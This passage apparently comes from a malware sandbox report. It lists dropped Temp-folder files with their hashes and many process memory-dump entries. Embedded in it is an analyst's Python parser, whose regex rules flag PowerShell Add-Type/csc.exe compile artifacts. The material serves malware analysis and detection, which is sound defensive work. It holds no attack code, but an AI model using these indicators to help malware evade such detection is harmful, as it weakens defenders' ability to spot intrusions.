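  MD5: 20b9b70df3d4658141b57560c7c22a38
  SHA256: c4e57ab90f35af1c50c0ef56cce03a0afbe88f25580ce341517b7090bddadbb5
• \??\c:\Users\Admin\AppData\Local\Temp\w3dxaopk\w3dxaopk.0.cs
  MD5: 9a10482acb9e6952b96f4efc24d9d783
  SHA256: a0424e1530f002761a882c19c22504153a5e86d7fbb41391e940452bfa15f377
• \??\c:\Users\Admin\AppData\Local\Temp\w3dxaopk\w3dxaopk.cmdline
  MD5: 12ecb4fb620b5882813954a0dd3bbe0c
  SHA256: b97bdb663a1661bbaa1f4702bbb32a0dd4c86b19cdf9901be415c16e68489a31
"""

FIELDS = ("filesize", "md5", "sha1", "sha256", "sha512")


@dataclass(frozen=True)
class DroppedFile:
    path: str
    md5: str
    sha256: str


def parse_dropped_files(text: str) -> list[DroppedFile]:
    """Split at each bullet: the first line is the path, the rest is a label/value
    stream (label on its own line, or 'Label: value'; both layouts parse)."""
    records = []
    for chunk in re.split(r"^\s*•\s*", text, flags=re.M):
        if not chunk.strip():
            continue
        path, _, rest = chunk.strip().partition("\n")
        tokens, fields, i = rest.split(), {}, 0
        while i + 1 < len(tokens):
            key = tokens[i].rstrip(":").lower()
            if key in FIELDS:
                fields[key] = tokens[i + 1].lower()
                i += 2
            else:
                i += 1
        records.append(DroppedFile(path.strip(), fields.get("md5", ""),
                                   fields.get("sha256", "")))
    return records


def normalize(path: str) -> str:
    """Drop the NT object-manager prefix (\\??\\) and lower-case for matching."""
    return path.removeprefix("\\??\\").lower()


# Add-Type/csc.exe leaves %TEMP%\<8 random chars>\<same 8>.0.cs, .cmdline and .dll
# plus a CSC<hex>.TMP in that directory (pattern names below are my own).
ADDTYPE_FILE = re.compile(
    r"^(?P<dir>.*\\temp\\(?P<name>[a-z0-9]{8}))\\(?P=name)\.(?P<kind>0\.cs|cmdline|dll)$")
CSC_TMP = re.compile(r"^(?P<dir>.*\\temp\\[a-z0-9]{8})\\csc[0-9a-f]+\.tmp$")


def unique_by_sha256(records: list[DroppedFile]) -> dict[str, set[str]]:
    """Collapse repeated writes of identical content: sha256 -> set of paths."""
    out = defaultdict(set)
    for r in records:
        if r.sha256:
            out[r.sha256].add(normalize(r.path))
    return dict(out)


def find_addtype_compile_dirs(records: list[DroppedFile]) -> dict[str, list[str]]:
    """Flag a temp directory only when both the generated source (.0.cs) and the
    csc.exe response file (.cmdline) are present; a lone .dll is too weak."""
    kinds = defaultdict(set)
    for r in records:
        p = normalize(r.path)
        if (m := ADDTYPE_FILE.match(p)):
            kinds[m["dir"]].add(m["kind"])
        elif (m := CSC_TMP.match(p)):
            kinds[m["dir"]].add("csc.tmp")
    return {d: sorted(k) for d, k in kinds.items() if {"0.cs", "cmdline"} <= k}
```

Requiring both the `.0.cs` and the `.cmdline` before flagging a directory keeps the rule from firing on a stray `.dll` in a random temp folder; the `RES*.tmp` files in this report are the resource stubs from the same compile and can be added as a further optional signal, but they sit directly in `%TEMP%` rather than in the per-compile subdirectory, so they are not tied to a directory by this rule.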

• memory/452-173-0x0000000000000000-mapping.dmp
• memory/676-186-0x0000000000000000-mapping.dmp
• memory/856-225-0x0000000000000000-mapping.dmp
• memory/956-226-0x0000000000000000-mapping.dmp
• memory/1196-196-0x0000000000000000-mapping.dmp
• memory/1300-199-0x0000000000000000-mapping.dmp
• memory/1340-209-0x0000000000000000-mapping.dmp
• memory/1728-142-0x00007FFC8A9B0000-0x00007FFC8B471000-memory.dmp
  Filesize: 10.8MB
• memory/1728-157-0x00007FFC8A9B0000-0x00007FFC8B471000-memory.dmp
  Filesize: 10.8MB
• memory/1728-140-0x0000000000000000-mapping.dmp
• memory/1728-158-0x000002B370E20000-0x000002B370E5D000-memory.dmp
  Filesize: 244KB
• memory/1728-141-0x000002B3708B0000-0x000002B3708D2000-memory.dmp
  Filesize: 136KB
• memory/1732-212-0x0000000000000000-mapping.dmp
• memory/1748-211-0x0000000000000000-mapping.dmp
• memory/1952-130-0x0000000000000000-mapping.dmp
• memory/1952-136-0x0000000001320000-0x000000000132D000-memory.dmp
  Filesize: 52KB
• memory/1952-131-0x0000000010000000-0x000000001000E000-memory.dmp
  Filesize: 56KB
• memory/1984-163-0x0000000000000000-mapping.dmp
• memory/2004-143-0x0000000000000000-mapping.dmp
• memory/2040-194-0x0000000000000000-mapping.dmp
• memory/2084-202-0x0000000000000000-mapping.dmp
• memory/2172-231-0x0000000000000000-mapping.dmp
• memory/2188-223-0x0000000000000000-mapping.dmp
• memory/2564-207-0x0000000000000000-mapping.dmp
• memory/2588-159-0x0000000008C40000-0x0000000008CE3000-memory.dmp
  Filesize: 652KB
• memory/2588-174-0x0000000009160000-0x000000000929B000-memory.dmp
  Filesize: 1.2MB
• memory/2588-187-0x0000000008C40000-0x0000000008CE3000-memory.dmp
  Filesize: 652KB
• memory/2588-178-0x0000000009460000-0x000000000959A000-memory.dmp
  Filesize: 1.2MB
• memory/2816-171-0x0000000000000000-mapping.dmp
• memory/2836-206-0x0000000000000000-mapping.dmp
• memory/3320-197-0x0000000000000000-mapping.dmp
• memory/3344-162-0x0000000000000000-mapping.dmp
• memory/3360-229-0x0000000000000000-mapping.dmp
• memory/3396-166-0x0000023B70780000-0x0000023B70823000-memory.dmp
  Filesize: 652KB
• memory/3520-169-0x000002A7FC800000-0x000002A7FC8A3000-memory.dmp
  Filesize: 652KB
• memory/3548-192-0x0000000000000000-mapping.dmp
• memory/3660-191-0x0000000000000000-mapping.dmp
• memory/3664-167-0x000002297F740000-0x000002297F7E3000-memory.dmp
  Filesize: 652KB
• memory/3680-153-0x0000000000000000-mapping.dmp
• memory/3792-222-0x0000000000000000-mapping.dmp
• memory/4008-227-0x0000000000000000-mapping.dmp
• memory/4180-184-0x0000000000000000-mapping.dmp
• memory/4216-201-0x0000000000000000-mapping.dmp
• memory/4272-204-0x0000000000000000-mapping.dmp
• memory/4360-182-0x0000000000000000-mapping.dmp
• memory/4372-168-0x0000000000000000-mapping.dmp
• memory/4384-230-0x0000000000000000-mapping.dmp
• memory/4544-146-0x0000000000000000-mapping.dmp
• memory/4568-150-0x0000000000000000-mapping.dmp
• memory/4584-160-0x0000000000000000-mapping.dmp
• memory/4652-188-0x0000000000000000-mapping.dmp
• memory/4672-218-0x0000000000000000-mapping.dmp
• memory/4748-215-0x0000000000000000-mapping.dmp
• memory/4752-161-0x0000000000000000-mapping.dmp
• memory/4752-164-0x0000000000826B20-0x0000000000826B24-memory.dmp
  Filesize: 4B
• memory/4752-165-0x00000000013F0000-0x0000000001486000-memory.dmp
  Filesize: 600KB
• memory/4768-219-0x0000000000000000-mapping.dmp
• memory/4812-213-0x0000000000000000-mapping.dmp
• memory/4836-189-0x0000000000000000-mapping.dmp
• memory/4912-217-0x0000000000000000-mapping.dmp
• memory/5028-221-0x0000000000000000-mapping.dmp